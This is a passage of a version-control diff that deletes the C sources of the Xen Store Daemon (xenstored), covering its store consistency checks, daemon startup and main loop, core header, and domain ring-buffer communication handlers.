*)child; - if (child) - node->childlen = strlen(child) + 1; - - if (!write_node(NULL, node)) - barf_perror("Could not create initial node %s", name); - talloc_free(node); -} - -static void setup_structure(void) -{ - char *tdbname; - tdbname = talloc_strdup(talloc_autofree_context(), xs_daemon_tdb()); - tdb_ctx = tdb_open(tdbname, 0, TDB_FLAGS, O_RDWR, 0); - - if (tdb_ctx) { - /* XXX When we make xenstored able to restart, this will have - to become cleverer, checking for existing domains and not - removing the corresponding entries, but for now xenstored - cannot be restarted without losing all the registered - watches, which breaks all the backend drivers anyway. We - can therefore get away with just clearing /local and - expecting Xend to put the appropriate entries back in. - - When this change is made it is important to note that - dom0's entries must be cleaned up on reboot _before_ this - daemon starts, otherwise the backend drivers and dom0's - balloon driver will pick up stale entries. In the case of - the balloon driver, this can be fatal. - */ - char *tlocal = talloc_strdup(NULL, "/local"); - - check_store(); - - if (remove_local) { - internal_rm("/local"); - create_node(NULL, tlocal, NULL, 0); - - check_store(); - } - - talloc_free(tlocal); - } - else { - tdb_ctx = tdb_open(tdbname, 7919, TDB_FLAGS, O_RDWR|O_CREAT, - 0640); - if (!tdb_ctx) - barf_perror("Could not create tdb file %s", tdbname); - - manual_node("/", "tool"); - manual_node("/tool", "xenstored"); - manual_node("/tool/xenstored", NULL); - - check_store(); - } -} - - -static unsigned int hash_from_key_fn(void *k) -{ - char *str = k; - unsigned int hash = 5381; - char c; - - while ((c = *str++)) - hash = ((hash << 5) + hash) + (unsigned int)c; - - return hash; -} - - -static int keys_equal_fn(void *key1, void *key2) -{ - return 0 == strcmp((char *)key1, (char *)key2); -} - - -static char *child_name(const char *s1, const char *s2) -{ - if (strcmp(s1, "/")) { - return talloc_asprintf(NULL, "%s/%s", s1, s2); - } - else { - return talloc_asprintf(NULL, "/%s", s2); - } -} - - -static void remember_string(struct hashtable *hash, const char *str) -{ - char *k = malloc(strlen(str) + 1); - strcpy(k, str); - hashtable_insert(hash, k, (void *)1); -} - - -/** - * A node has a children field that names the children of the node, separated - * by NULs. We check whether there are entries in there that are duplicated - * (and if so, delete the second one), and whether there are any that do not - * have a corresponding child node (and if so, delete them). Each valid child - * is then recursively checked. - * - * No deleting is performed if the recovery flag is cleared (i.e. -R was - * passed on the command line). - * - * As we go, we record each node in the given reachable hashtable. These - * entries will be used later in clean_store. - */ -static void check_store_(const char *name, struct hashtable *reachable) -{ - struct node *node = read_node(NULL, name); - - if (node) { - size_t i = 0; - - struct hashtable * children = - create_hashtable(16, hash_from_key_fn, keys_equal_fn); - - remember_string(reachable, name); - - while (i < node->childlen) { - size_t childlen = strlen(node->children + i); - char * childname = child_name(node->name, - node->children + i); - struct node *childnode = read_node(NULL, childname); - - if (childnode) { - if (hashtable_search(children, childname)) { - log("check_store: '%s' is duplicated!", - childname); - - if (recovery) { - remove_child_entry(NULL, node, - i); - i -= childlen + 1; - } - } - else { - remember_string(children, childname); - check_store_(childname, reachable); - } - } - else { - log("check_store: No child '%s' found!\n", - childname); - - if (recovery) { - remove_child_entry(NULL, node, i); - i -= childlen + 1; - } - } - - talloc_free(childnode); - talloc_free(childname); - i += childlen + 1; - } - - hashtable_destroy(children, 0 /* Don't free values (they are - all (void *)1) */); - talloc_free(node); - } - else { - /* Impossible, because no database should ever be without the - root, and otherwise, we've just checked in our caller - (which made a recursive call to get here). */ - - log("check_store: No child '%s' found: impossible!", name); - } -} - - -/** - * Helper to clean_store below. - */ -static int clean_store_(TDB_CONTEXT *tdb, TDB_DATA key, TDB_DATA val, - void *private) -{ - struct hashtable *reachable = private; - char * name = talloc_strndup(NULL, key.dptr, key.dsize); - - if (!hashtable_search(reachable, name)) { - log("clean_store: '%s' is orphaned!", name); - if (recovery) { - tdb_delete(tdb, key); - } - } - - talloc_free(name); - - return 0; -} - - -/** - * Given the list of reachable nodes, iterate over the whole store, and - * remove any that were not reached. - */ -static void clean_store(struct hashtable *reachable) -{ - tdb_traverse(tdb_ctx, &clean_store_, reachable); -} - - -static void check_store(void) -{ - char * root = talloc_strdup(NULL, "/"); - struct hashtable * reachable = - create_hashtable(16, hash_from_key_fn, keys_equal_fn); - - log("Checking store ..."); - check_store_(root, reachable); - clean_store(reachable); - log("Checking store complete."); - - hashtable_destroy(reachable, 0 /* Don't free values (they are all - (void *)1) */); - talloc_free(root); -} - - -/* Something is horribly wrong: check the store. */ -static void corrupt(struct connection *conn, const char *fmt, ...) -{ - va_list arglist; - char *str; - int saved_errno = errno; - - va_start(arglist, fmt); - str = talloc_vasprintf(NULL, fmt, arglist); - va_end(arglist); - - log("corruption detected by connection %i: err %s: %s", - conn ? (int)conn->id : -1, strerror(saved_errno), str); - - check_store(); -} - - -static void write_pidfile(const char *pidfile) -{ - char buf[100]; - int len; - int fd; - - fd = open(pidfile, O_RDWR | O_CREAT, 0600); - if (fd == -1) - barf_perror("Opening pid file %s", pidfile); - - /* We exit silently if daemon already running. */ - if (lockf(fd, F_TLOCK, 0) == -1) - exit(0); - - len = snprintf(buf, sizeof(buf), "%ld\n", (long)getpid()); - if (write(fd, buf, len) != len) - barf_perror("Writing pid file %s", pidfile); -} - -/* Stevens. */ -static void daemonize(void) -{ - pid_t pid; - - /* Separate from our parent via fork, so init inherits us. */ - if ((pid = fork()) < 0) - barf_perror("Failed to fork daemon"); - if (pid != 0) - exit(0); - - /* Session leader so ^C doesn't whack us. */ - setsid(); - - /* Let session leader exit so child cannot regain CTTY */ - if ((pid = fork()) < 0) - barf_perror("Failed to fork daemon"); - if (pid != 0) - exit(0); - - /* Move off any mount points we might be in. */ - if (chdir("/") == -1) - barf_perror("Failed to chdir"); - - /* Discard our parent's old-fashioned umask prejudices. */ - umask(0); -} - - -static void usage(void) -{ - fprintf(stderr, -"Usage:\n" -"\n" -" xenstored \n" -"\n" -"where options may include:\n" -"\n" -" --no-domain-init to state that xenstored should not initialise dom0,\n" -" --pid-file giving a file for the daemon's pid to be written,\n" -" --help to output this message,\n" -" --no-fork to request that the daemon does not fork,\n" -" --output-pid to request that the pid of the daemon is output,\n" -" --trace-file giving the file for logging, and\n" -" --entry-nb limit the number of entries per domain,\n" -" --entry-size limit the size of entry per domain, and\n" -" --entry-watch limit the number of watches per domain,\n" -" --transaction limit the number of transaction allowed per domain,\n" -" --no-recovery to request that no recovery should be attempted when\n" -" the store is corrupted (debug only),\n" -" --preserve-local to request that /local is preserved on start-up,\n" -" --verbose to request verbose execution.\n"); -} - - -static struct option options[] = { - { "no-domain-init", 0, NULL, 'D' }, - { "entry-nb", 1, NULL, 'E' }, - { "pid-file", 1, NULL, 'F' }, - { "help", 0, NULL, 'H' }, - { "no-fork", 0, NULL, 'N' }, - { "output-pid", 0, NULL, 'P' }, - { "entry-size", 1, NULL, 'S' }, - { "trace-file", 1, NULL, 'T' }, - { "transaction", 1, NULL, 't' }, - { "no-recovery", 0, NULL, 'R' }, - { "preserve-local", 0, NULL, 'L' }, - { "verbose", 0, NULL, 'V' }, - { "watch-nb", 1, NULL, 'W' }, - { NULL, 0, NULL, 0 } }; - -extern void dump_conn(struct connection *conn); - -int main(int argc, char *argv[]) -{ - int opt, *sock, *ro_sock, max; - struct sockaddr_un addr; - fd_set inset, outset; - bool dofork = true; - bool outputpid = false; - bool no_domain_init = false; - const char *pidfile = NULL; - int evtchn_fd = -1; - struct timeval *timeout; - - while ((opt = getopt_long(argc, argv, "DE:F:HNPS:t:T:RLVW:", options, - NULL)) != -1) { - switch (opt) { - case 'D': - no_domain_init = true; - break; - case 'E': - quota_nb_entry_per_domain = strtol(optarg, NULL, 10); - break; - case 'F': - pidfile = optarg; - break; - case 'H': - usage(); - return 0; - case 'N': - dofork = false; - break; - case 'P': - outputpid = true; - break; - case 'R': - recovery = false; - break; - case 'L': - remove_local = false; - break; - case 'S': - quota_max_entry_size = strtol(optarg, NULL, 10); - break; - case 't': - quota_max_transaction = strtol(optarg, NULL, 10); - break; - case 'T': - tracefile = optarg; - break; - case 'V': - verbose = true; - break; - case 'W': - quota_nb_watch_per_domain = strtol(optarg, NULL, 10); - break; - } - } - if (optind != argc) - barf("%s: No arguments desired", argv[0]); - - reopen_log(); - - /* make sure xenstored directory exists */ - if (mkdir(xs_daemon_rundir(), 0755)) { - if (errno != EEXIST) { - perror("error: mkdir daemon rundir"); - exit(-1); - } - } - - if (mkdir(xs_daemon_rootdir(), 0755)) { - if (errno != EEXIST) { - perror("error: mkdir daemon rootdir"); - exit(-1); - } - } - - if (dofork) { - openlog("xenstored", 0, LOG_DAEMON); - daemonize(); - } - if (pidfile) - write_pidfile(pidfile); - - /* Talloc leak reports go to stderr, which is closed if we fork. */ - if (!dofork) - talloc_enable_leak_report_full(); - - /* Create sockets for them to listen to. */ - sock = talloc(talloc_autofree_context(), int); - *sock = socket(PF_UNIX, SOCK_STREAM, 0); - if (*sock < 0) - barf_perror("Could not create socket"); - ro_sock = talloc(talloc_autofree_context(), int); - *ro_sock = socket(PF_UNIX, SOCK_STREAM, 0); - if (*ro_sock < 0) - barf_perror("Could not create socket"); - talloc_set_destructor(sock, destroy_fd); - talloc_set_destructor(ro_sock, destroy_fd); - - /* Don't kill us with SIGPIPE. */ - signal(SIGPIPE, SIG_IGN); - - /* FIXME: Be more sophisticated, don't mug running daemon. */ - unlink(xs_daemon_socket()); - unlink(xs_daemon_socket_ro()); - - addr.sun_family = AF_UNIX; - strcpy(addr.sun_path, xs_daemon_socket()); - if (bind(*sock, (struct sockaddr *)&addr, sizeof(addr)) != 0) - barf_perror("Could not bind socket to %s", xs_daemon_socket()); - strcpy(addr.sun_path, xs_daemon_socket_ro()); - if (bind(*ro_sock, (struct sockaddr *)&addr, sizeof(addr)) != 0) - barf_perror("Could not bind socket to %s", - xs_daemon_socket_ro()); - if (chmod(xs_daemon_socket(), 0600) != 0 - || chmod(xs_daemon_socket_ro(), 0660) != 0) - barf_perror("Could not chmod sockets"); - - if (listen(*sock, 1) != 0 - || listen(*ro_sock, 1) != 0) - barf_perror("Could not listen on sockets"); - - if (pipe(reopen_log_pipe)) { - barf_perror("pipe"); - } - - /* Setup the database */ - setup_structure(); - - /* Listen to hypervisor. */ - if (!no_domain_init) - domain_init(); - - /* Restore existing connections. */ - restore_existing_connections(); - - if (outputpid) { - printf("%ld\n", (long)getpid()); - fflush(stdout); - } - - /* redirect to /dev/null now we're ready to accept connections */ - if (dofork) { - int devnull = open("/dev/null", O_RDWR); - if (devnull == -1) - barf_perror("Could not open /dev/null\n"); - dup2(devnull, STDIN_FILENO); - dup2(devnull, STDOUT_FILENO); - dup2(devnull, STDERR_FILENO); - close(devnull); - xprintf = trace; - } - - signal(SIGHUP, trigger_reopen_log); - - if (xce_handle != -1) - evtchn_fd = xc_evtchn_fd(xce_handle); - - /* Get ready to listen to the tools. */ - max = initialize_set(&inset, &outset, *sock, *ro_sock, &timeout); - - /* Tell the kernel we're up and running. */ - xenbus_notify_running(); - - /* Main loop. */ - for (;;) { - struct connection *conn, *next; - - if (select(max+1, &inset, &outset, NULL, timeout) < 0) { - if (errno == EINTR) - continue; - barf_perror("Select failed"); - } - - if (FD_ISSET(reopen_log_pipe[0], &inset)) { - char c; - if (read(reopen_log_pipe[0], &c, 1) != 1) - barf_perror("read failed"); - reopen_log(); - } - - if (FD_ISSET(*sock, &inset)) - accept_connection(*sock, true); - - if (FD_ISSET(*ro_sock, &inset)) - accept_connection(*ro_sock, false); - - if (evtchn_fd != -1 && FD_ISSET(evtchn_fd, &inset)) - handle_event(); - - next = list_entry(connections.next, typeof(*conn), list); - while (&next->list != &connections) { - conn = next; - - next = list_entry(conn->list.next, - typeof(*conn), list); - - if (conn->domain) { - talloc_increase_ref_count(conn); - if (domain_can_read(conn)) - handle_input(conn); - if (talloc_free(conn) == 0) - continue; - - talloc_increase_ref_count(conn); - if (domain_can_write(conn) && - !list_empty(&conn->out_list)) - handle_output(conn); - if (talloc_free(conn) == 0) - continue; - } else { - talloc_increase_ref_count(conn); - if (FD_ISSET(conn->fd, &inset)) - handle_input(conn); - if (talloc_free(conn) == 0) - continue; - - talloc_increase_ref_count(conn); - if (FD_ISSET(conn->fd, &outset)) - handle_output(conn); - if (talloc_free(conn) == 0) - continue; - } - } - - max = initialize_set(&inset, &outset, *sock, *ro_sock, - &timeout); - } -} - -/* - * Local variables: - * c-file-style: "linux" - * indent-tabs-mode: t - * c-indent-level: 8 - * c-basic-offset: 8 - * tab-width: 8 - * End: - */ diff -r 10a8fae412c5 tools/xenstore/xenstored_core.h --- a/tools/xenstore/xenstored_core.h Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,191 +0,0 @@ -/* - Internal interfaces for Xen Store Daemon. - Copyright (C) 2005 Rusty Russell IBM Corporation - - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation; either version 2 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program; if not, write to the Free Software - Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA -*/ - -#ifndef _XENSTORED_CORE_H -#define _XENSTORED_CORE_H - -#include - -#include -#include -#include -#include -#include -#include "xs_lib.h" -#include "list.h" -#include "tdb.h" - -struct buffered_data -{ - struct list_head list; - - /* Are we still doing the header? */ - bool inhdr; - - /* How far are we? */ - unsigned int used; - - union { - struct xsd_sockmsg msg; - char raw[sizeof(struct xsd_sockmsg)]; - } hdr; - - /* The actual data. */ - char *buffer; -}; - -struct connection; -typedef int connwritefn_t(struct connection *, const void *, unsigned int); -typedef int connreadfn_t(struct connection *, void *, unsigned int); - -struct connection -{ - struct list_head list; - - /* The file descriptor we came in on. */ - int fd; - - /* Who am I? 0 for socket connections. */ - unsigned int id; - - /* Is this a read-only connection? */ - bool can_write; - - /* Buffered incoming data. */ - struct buffered_data *in; - - /* Buffered output data */ - struct list_head out_list; - - /* Transaction context for current request (NULL if none). */ - struct transaction *transaction; - - /* List of in-progress transactions. */ - struct list_head transaction_list; - uint32_t next_transaction_id; - unsigned int transaction_started; - - /* The domain I'm associated with, if any. */ - struct domain *domain; - - /* The target of the domain I'm associated with. */ - struct connection *target; - - /* My watches. */ - struct list_head watches; - - /* Methods for communicating over this connection: write can be NULL */ - connwritefn_t *write; - connreadfn_t *read; -}; -extern struct list_head connections; - -struct node { - const char *name; - - /* Database I came from */ - TDB_CONTEXT *tdb; - - /* Parent (optional) */ - struct node *parent; - - /* Permissions. */ - unsigned int num_perms; - struct xs_permissions *perms; - - /* Contents. */ - unsigned int datalen; - void *data; - - /* Children, each nul-terminated. */ - unsigned int childlen; - char *children; -}; - -/* Break input into vectors, return the number, fill in up to num of them. */ -unsigned int get_strings(struct buffered_data *data, - char *vec[], unsigned int num); - -/* Is child node a child or equal to parent node? */ -bool is_child(const char *child, const char *parent); - -void send_reply(struct connection *conn, enum xsd_sockmsg_type type, - const void *data, unsigned int len); - -/* Some routines (write, mkdir, etc) just need a non-error return */ -void send_ack(struct connection *conn, enum xsd_sockmsg_type type); - -/* Send an error: error is usually "errno". */ -void send_error(struct connection *conn, int error); - -/* Canonicalize this path if possible. */ -char *canonicalize(struct connection *conn, const char *node); - -/* Check if node is an event node. */ -bool check_event_node(const char *node); - -/* Get this node, checking we have permissions. */ -struct node *get_node(struct connection *conn, - const char *name, - enum xs_perm_type perm); - -/* Get TDB context for this connection */ -TDB_CONTEXT *tdb_context(struct connection *conn); - -/* Destructor for tdbs: required for transaction code */ -int destroy_tdb(void *_tdb); - -/* Replace the tdb: required for transaction code */ -bool replace_tdb(const char *newname, TDB_CONTEXT *newtdb); - -struct connection *new_connection(connwritefn_t *write, connreadfn_t *read); - - -/* Is this a valid node name? */ -bool is_valid_nodename(const char *node); - -/* Tracing infrastructure. */ -void trace_create(const void *data, const char *type); -void trace_destroy(const void *data, const char *type); -void trace_watch_timeout(const struct connection *conn, const char *node, const char *token); -void trace(const char *fmt, ...); -void dtrace_io(const struct connection *conn, const struct buffered_data *data, int out); - -extern int event_fd; - -/* Map the kernel's xenstore page. */ -void *xenbus_map(void); - -/* Return the event channel used by xenbus. */ -evtchn_port_t xenbus_evtchn(void); - -/* Tell the kernel xenstored is running. */ -void xenbus_notify_running(void); - -#endif /* _XENSTORED_CORE_H */ - -/* - * Local variables: - * c-file-style: "linux" - * indent-tabs-mode: t - * c-indent-level: 8 - * c-basic-offset: 8 - * tab-width: 8 - * End: - */ diff -r 10a8fae412c5 tools/xenstore/xenstored_domain.c --- a/tools/xenstore/xenstored_domain.c Wed Jan 14 13:43:17 2009 +0000 +++ /dev/null Thu Jan 01 00:00:00 1970 +0000 @@ -1,710 +0,0 @@ -/* - Domain communications for Xen Store Daemon. - Copyright (C) 2005 Rusty Russell IBM Corporation - - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation; either version 2 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program; if not, write to the Free Software - Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA -*/ - -#include -#include -#include -#include -#include - -#include "utils.h" -#include "talloc.h" -#include "xenstored_core.h" -#include "xenstored_domain.h" -#include "xenstored_transaction.h" -#include "xenstored_watch.h" - -#include - -static int *xc_handle; -static evtchn_port_t virq_port; - -int xce_handle = -1; - -struct domain -{ - struct list_head list; - - /* The id of this domain */ - unsigned int domid; - - /* Event channel port */ - evtchn_port_t port; - - /* The remote end of the event channel, used only to validate - repeated domain introductions. */ - evtchn_port_t remote_port; - - /* The mfn associated with the event channel, used only to validate - repeated domain introductions. */ - unsigned long mfn; - - /* Domain path in store. */ - char *path; - - /* Shared page. */ - struct xenstore_domain_interface *interface; - - /* The connection associated with this. */ - struct connection *conn; - - /* Have we noticed that this domain is shutdown? */ - int shutdown; - - /* number of entry from this domain in the store */ - int nbentry; - - /* number of watch for this domain */ - int nbwatch; -}; - -static LIST_HEAD(domains); - -static bool check_indexes(XENSTORE_RING_IDX cons, XENSTORE_RING_IDX prod) -{ - return ((prod - cons) <= XENSTORE_RING_SIZE); -} - -static void *get_output_chunk(XENSTORE_RING_IDX cons, - XENSTORE_RING_IDX prod, - char *buf, uint32_t *len) -{ - *len = XENSTORE_RING_SIZE - MASK_XENSTORE_IDX(prod); - if ((XENSTORE_RING_SIZE - (prod - cons)) < *len) - *len = XENSTORE_RING_SIZE - (prod - cons); - return buf + MASK_XENSTORE_IDX(prod); -} - -static const void *get_input_chunk(XENSTORE_RING_IDX cons, - XENSTORE_RING_IDX prod, - const char *buf, uint32_t *len) -{ - *len = XENSTORE_RING_SIZE - MASK_XENSTORE_IDX(cons); - if ((prod - cons) < *len) - *len = prod - cons; - return buf + MASK_XENSTORE_IDX(cons); -} - -static int writechn(struct connection *conn, - const void *data, unsigned int len) -{ - uint32_t avail; - void *dest; - struct xenstore_domain_interface *intf = conn->domain->interface; - XENSTORE_RING_IDX cons, prod; - - /* Must read indexes once, and before anything else, and verified. */ - cons = intf->rsp_cons; - prod = intf->rsp_prod; - xen_mb(); - - if (!check_indexes(cons, prod)) { - errno = EIO; - return -1; - } - - dest = get_output_chunk(cons, prod, intf->rsp, &avail); - if (avail < len) - len = avail; - - memcpy(dest, data, len); - xen_mb(); - intf->rsp_prod += len; - - xc_evtchn_notify(xce_handle, conn->domain->port); - - return len; -} - -static int readchn(struct connection *conn, void *data, unsigned int len) -{ - uint32_t avail; - const void *src; - struct xenstore_domain_interface *intf = conn->domain->interface; - XENSTORE_RING_IDX cons, prod; - - /* Must read indexes once, and before anything else, and verified. */ - cons = intf->req_cons; - prod = intf->req_prod; - xen_mb(); - - if (!check_indexes(cons, prod)) { - errno = EIO; - return -1; - } - - src = get_input_chunk(cons, prod, intf->req, &avail); - if (avail < len) - len = avail; - - memcpy(data, src, len); - xen_mb(); - intf->req_cons += len; - - xc_evtchn_notify(xce_handle, conn->domain->port); - - return len; -} - -static int destroy_domain(void *_domain) -{ - struct domain *domain = _domain; - - list_del(&domain->list); - - if (domain->port) { - if (xc_evtchn_unbind(xce_handle, domain->port) == -1) - eprintf("> Unbinding port %i failed!\n", domain->port); - } - - if (domain->interface) - munmap(domain->interface, getpagesize()); - - fire_watches(NULL, "@releaseDomain", false); - - return 0; -} - -static void domain_cleanup(void) -{ - xc_dominfo_t dominfo; - struct domain *domain, *tmp; - int notify = 0; - - list_for_each_entry_safe(domain, tmp, &domains, list) { - if (xc_domain_getinfo(*xc_handle, domain->domid, 1, - &dominfo) == 1 && - dominfo.domid == domain->domid) { - if ((dominfo.crashed || dominfo.shutdown) - && !domain->shutdown) { - domain->shutdown = 1; - notify = 1; - } - if (!dominfo.dying) - continue; - } - talloc_free(domain->conn); - notify = 0; /* destroy_domain() fires the watch */ - } - - if (notify) - fire_watches(NULL, "@releaseDomain", false); -} - -/* We scan all domains rather than use the information given here. */ -void handle_event(void) -{ - evtchn_port_t port; - - if ((port = xc_evtchn_pending(xce_handle)) == -1) - barf_perror("Failed to read from event fd"); - - if (port == virq_port) - domain_cleanup(); - - if (xc_evtchn_unmask(xce_handle, port) == -1) - barf_perror("Failed to write to event fd"); -} - -bool domain_can_read(struct connection *conn) -{ - struct xenstore_domain_interface *intf = conn->domain->interface; - return (intf->req_cons != intf->req_prod); -} - -bool domain_is_unprivileged(struct connection *conn) -{ - return (conn && conn->domain && conn->domain->domid != 0); -} - -bool domain_can_write(struct connection *conn) -{ - struct xenstore_domain_interface *intf = conn->domain->interface; - return ((intf->rsp_prod - intf->rsp_cons) != XENSTORE_RING_SIZE); -} - -static char *talloc_domain_path(void *context, unsigned int domid) -{ - return talloc_asprintf(context, "/local/domain/%u", domid); -} - -static struct domain *new_domain(void *context, unsigned int domid, - int port) -{ - struct domain *domain; - int rc; - - domain = talloc(context, struct domain); - domain->port = 0; - domain->shutdown = 0; - domain->domid = domid; - domain->path = talloc_domain_path(domain, domid); - - list_add(&domain->list, &domains); - talloc_set_destructor(domain, destroy_domain); - - /* Tell kernel we're interested in this event. */ - rc = xc_evtchn_bind_interdomain(xce_handle, domid, port); - if (rc == -1) - return NULL; - domain->port = rc; - - domain->conn = new_connection(writechn, readchn); - domain->conn->domain = domain; - domain->conn->id = domid; - - domain->remote_port = port; - domain->nbentry = 0; - domain->nbwatch = 0; - - return domain; -} - - -static struct domain *find_domain_by_domid(unsigned int domid) -{ - struct domain *i; - - list_for_each_entry(i, &domains, list) { - if (i->domid == domid) - return i; - } - return NULL; -} - -static void domain_conn_reset(struct domain *domain) -{ - struct connection *conn = domain->conn; - struct buffered_data *out; - - conn_delete_all_watches(conn); - conn_delete_all_transactions(conn); - - while ((out = list_top(&conn->out_list, struct buffered_data, list))) { - list_del(&out->list); - talloc_free(out); - } - - talloc_free(conn->in->buffer); - memset(conn->in, 0, sizeof(*conn->in)); - conn->in->inhdr = true; - - domain->interface->req_cons = domain->interface->req_prod = 0; - domain->interface->rsp_cons = domain->interface->rsp_prod = 0; -} - -/* domid, mfn, evtchn, path */ -void do_introduce(struct connection *conn, struct buffered_data *in) -{ - struct domain *domain; - char *vec[3]; - unsigned int domid; - unsigned long mfn; - evtchn_port_t port; - int rc; - struct xenstore_domain_interface *interface; - - if (get_strings(in, vec, ARRAY_SIZE(vec)) < ARRAY_SIZE(vec)) { - send_error(conn, EINVAL); - return; - } - - if (conn->id != 0 || !conn->can_write) { - send_error(conn, EACCES); - return; - } - - domid = atoi(vec[0]); - mfn = atol(vec[1]); - port = atoi(vec[2]); - - /* Sanity check args. */ - if (port <= 0) { - send_error(conn, EINVAL); - return; - } - - domain = find_domain_by_domid(domid); - - if (domain == NULL) { - interface = xc_map_foreign_range( - *xc_handle, domid, - getpagesize(), PROT_READ|PROT_WRITE, mfn); - if (!interface) { - send_error(conn, errno); - return; - } - /* Hang domain off "in" until we're finished. */ - domain = new_domain(in, domid, port); - if (!domain) { - munmap(interface, getpagesize()); - send_error(conn, errno); - return; - } - domain->interface = interface; - domain->mfn = mfn; - - /* Now domain belongs to its connection. */ - talloc_steal(domain->conn, domain); - - fire_watches(NULL, "@introduceDomain", false); - } else if ((domain->mfn == mfn) && (domain->conn != conn)) { - /* Use XS_INTRODUCE for recreating the xenbus event-channel. */ - if (domain->port) - xc_evtchn_unbind(xce_handle, domain->port); - rc = xc_evtchn_bind_interdomain(xce_handle, domid, port); - domain->port = (rc == -1) ? 0 : rc; - domain->remote_port = port; - } else { - send_error(conn, EINVAL); - return; - } - - domain_conn_reset(domain); - - send_ack(conn, XS_INTRODUCE); -} - -void do_set_target(struct connection *conn, struct buffered_data *in) -{ - char *vec[2]; - unsigned int domid, tdomid; - struct domain *domain, *tdomain; - if (get_strings(in, vec, ARRAY_SIZE(vec)) < ARRAY_SIZE(vec)) { - send_error(conn, EINVAL); - return; - } - - if (conn->id != 0 || !conn->can_write) { - send_error(conn, EACCES); - return; - } - - domid = atoi(vec[0]); - tdomid = atoi(vec[1]); - - domain = find_domain_by_domid(domid); - if (!domain) { - send_error(conn, ENOENT); - return; - } - if (!domain->conn) { - send_error(conn, EINVAL); - return; - } - - tdomain = find_domain_by_domid(tdomid); - if (!tdomain) { - send_error(conn, ENOENT); - return; - } - - if (!tdomain->conn) { - send_error(conn, EINVAL); - return; - } - - talloc_reference(domain->conn, tdomain->conn); - domain->conn->target = tdomain->conn; - - send_ack(conn, XS_SET_TARGET); -} - -/* domid */ -void do_release(struct connection *conn, const char *domid_str) -{ - struct domain *domain; - unsigned int domid; - - if (!domid_str) { - send_error(conn, EINVAL); - return; - } - - domid = atoi(domid_str); - if (!domid) { - send_error(conn, EINVAL); - return; - } - - if (conn->id != 0) { - send_error(conn, EACCES); - return; - } - - domain = find_domain_by_domid(domid); - if (!domain) { - send_error(conn, ENOENT); - return; - } - - if (!domain->conn) { - send_error(conn, EINVAL); - return; - } - - talloc_free(domain->conn); - - send_ack(conn, XS_RELEASE); -} - -void do_resume(struct connection *conn, const char *domid_str) -{ - struct domain *domain; - unsigned int domid; - - if (!domid_str) { - send_error(conn, EINVAL); - return; - } - - domid = atoi(domid_str); - if (!domid) { - send_error(conn, EINVAL); - return; - } - - if (conn->id != 0) { - send_error(conn, EACCES); - return; - } - - domain = find_domain_by_domid(domid); - if (!domain) { - send_error(conn, ENOENT); - return; - } - - if (!domain->conn) { - send_error(conn, EINVAL); - return; - } - - domain->shutdown = 0; - - send_ack(conn, XS_RESUME); -} - -void do_get_domain_path(struct connection *conn, const char *domid_str) -{ - char *path; - - if (!domid_str) { - send_error(conn, EINVAL); - return; - } - - path = talloc_domain_path(conn, atoi(domid_str)); - - send_reply(conn, XS_GET_DOMAIN_PATH, path, strlen(path) + 1); - - talloc_free(path); -} - -void do_is_domain_introduced(struct connection *conn, const char *domid_str) -{ - int result; - unsigned int domid; - - if (!domid_str) { - send_error(conn, EINVAL); - return; - } - - domid = atoi(domid_str); - if (domid == DOMID_SELF) - result = 1; - else - result = (find_domain_by_domid(domid) != NULL); - - send_reply(conn, XS_IS_DOMAIN_INTRODUCED, result ? "T" : "F", 2); -} - -static int close_xc_handle(void *_handle) -{ - xc_interface_close(*(int *)_handle); - return 0; -} - -/* Returns the implicit path of a connection (only domains have this) */ -const char *get_implicit_path(const struct connection *conn) -{ - if (!conn->domain) - return NULL; - return conn->domain->path; -} - -/* Restore existing connections. */ -void restore_existing_connections(void) -{ -} - -static int dom0_init(void) -{ - evtchn_port_t port; - struct domain *dom0; - - port = xenbus_evtchn(); - if (port == -1) - return -1; - - dom0 = new_domain(NULL, 0, port); - if (dom0 == NULL) - return -1; - - dom0->interface = xenbus_map(); - if (dom0->interface == NULL) - return -1; - - talloc_steal(dom0->conn, dom0); - - xc_evtchn_notify(xce_handle, dom0->port); - - return 0; -} - -/* Returns the event channel handle. */ -int domain_init(void) -{ - int rc; - - xc_handle = talloc(talloc_autofree_context(), int); - if (!xc_handle) - barf_perror("Failed to allocate domain handle"); - - *xc_handle = xc_interface_open(); - if (*xc_handle < 0) - barf_perror("Failed to open connection to hypervisor"); - - talloc_set_destructor(xc_handle, close_xc_handle); - - xce_handle = xc_evtchn_open(); - - if (xce_handle < 0) - barf_perror("Failed to open evtchn device"); - - if (dom0_init() != 0) - barf_perror("Failed to initialize dom0 state"); - - if ((rc = xc_evtchn_bind_virq(xce_handle, VIRQ_DOM_EXC)) == -1) - barf_perror("Failed to bind to domain exception virq port"); - virq_port = rc; - - return xce_handle; -} - -void domain_entry_inc(struct connection *conn, struct node *node) -{ - struct domain *d; - - if (!conn) - return; - - if (node->perms && node->perms[0].id != conn->id) { - if (conn->transaction) { - transaction_entry_inc(conn->transaction, - node->perms[0].id); - } else { - d = find_domain_by_domid(node->perms[0].id); - if (d) - d->nbentry++; - } - } else if (conn->domain) { - if (conn->transaction) { - transaction_entry_inc(conn->transaction, - conn->domain->domid); - } else { - conn->domain->nbentry++; - } - } -} - -void domain_entry_dec(struct connection *conn, struct node *node) -{ - struct domain *d; - - if (!conn) - return; - - if (node->perms && node->perms[0].id != conn->id) { - if (conn->transaction) { - transaction_entry_dec(conn->transaction, - node->perms[0].id); - } else { - d = find_domain_by_domid(node->perms[0].id); - if (d && d->nbentry) - d->nbentry--; - } - } else if (conn->domain && conn->domain->nbentry) { - if (conn->transaction) { - transaction_entry_dec(conn->transaction, - conn->domain->domid); - } else { - conn->domain->nbentry--; - } - } -} - -void domain_entry_fix(unsigned int domid, int num) -{ - struct domain *d; - - d = find_domain_by_domid(domid); - if (d 